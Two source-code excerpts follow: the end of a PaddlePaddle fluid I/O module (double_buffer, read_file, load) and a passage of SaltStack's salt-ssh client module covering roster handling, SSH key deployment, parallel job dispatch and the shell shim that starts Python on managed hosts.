Wrap a double buffer reader. The class Reader contains DecoratedReader and FileReader. Moreover, the DecoratedReader is inherited by CustomReader and BufferedReader. This function is related to BufferedReader. The data will copy to target place with a double buffer queue. If the target place is None, the place that executor perform on will be used.
Args:
reader (Variable): The Reader Variable need to be wrapped.
place (Place, optional): The place of target data, such as CPU, GPU, and if use GPU, it's necessary to point out which card is involved. Default is the sample place of executor perform.
name (str, optional): Variable name. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Variable(Reader): wrapped reader with double buffer.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
use_double_buffer=False)
reader = fluid.layers.double_buffer(reader)
image, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def read_file(reader):
"""
:api_attr: Static Graph
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` .
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read from the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
image, label = fluid.layers.read_file(reader)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
def load(out, file_path, load_as_fp16=None):
"""
Load operator will load a LoDTensor / SelectedRows variable from disk file.
Args:
out(Variable): The LoDTensor / SelectedRows need to be loaded..
file_path(STRING): Variable will be loaded from "file_path".
load_as_fp16(BOOLEAN): If true, the tensor will be first loaded and then converted to float16 data type. Otherwise, the tensor will be directly loaded without data type conversion. Default is false..
Returns:
None
Examples:
.. code-block:: python
import paddle.fluid as fluid
tmp_tensor = fluid.layers.create_tensor(dtype='float32')
fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, outputs={"Out": out}, attrs=attrs)
|
__init__.py
|
"""
Create ssh executor system
"""
# Import python libs
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log
import salt.minion
# Import salt libs
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
from salt.utils.platform import is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossibe to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
if not is_windows():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
SSH_PY_SHIM = ssh_py_shim.read()
log = logging.getLogger(__name__)
class SSH:
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg="No ssh binary found in path -- ssh must be installed for salt-ssh to run. Exiting.",
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate keys.\n\n"
"You can probably resolve this by executing this script with "
"increased permissions via sudo or by running as root.\n"
"You could also use the '-c' option to supply a configuration "
"directory that you have permissions to read and write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.serial = salt.payload.Serial(opts)
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
python2_bin=self.opts["python2_bin"],
python3_bin=self.opts["python3_bin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figures out if the target is a reachable host without wildcards, expands if any.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
if hostname in [host_id, roster_data[host_id].get("host")]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n host: '
"{hostname}\n user: {user}"
"\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=self.opts.get("tgt", ""),
user=self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host {} has been added to the roster {}".format(
self.opts.get("tgt", ""), roster_file
)
)
else:
log.error("Unable to update roster {}: access denied".format(roster_file))
def _update_targets(self):
"""
Uptade targets in case hostname was directly passed without the roster.
:return:
"""
hostname = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
(
"Permission denied for host {}, do you want to deploy "
"the salt-ssh key? (password required):"
).format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {}@{}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
stdout, stderr, retcode = single.run()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = "Please contact sales@saltstack.com for access to the enterprise saltwinshell module."
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
routine = Process(target=self.handle_routine, args=args)
routine.start()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
# This bare exception is here to catch spurious exceptions
# thrown by que.get during healthy operation. Please do not
# worry about this bare exception, it is entirely here to
# control program flow.
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
pass
if host not in returned:
error = (
"Target '{}' did not return any data, "
"probably due to an error."
).format(host)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(iter(ret.keys()))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(iter(ret.keys()))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, str):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.serial = salt.payload.Serial(opts)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin, os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"], os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"{} thin dir already exists. Not running ssh_pre_flight script".format(
self.thin_dir
)
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script {} does not exist".format(
self.ssh_pre_flight
)
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if stderr:
log.error(
"Error running ssh_pre_flight script {}".format(
self.ssh_pre_file
)
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: {}".format(
self.ssh_pre_file
)
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, '')
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
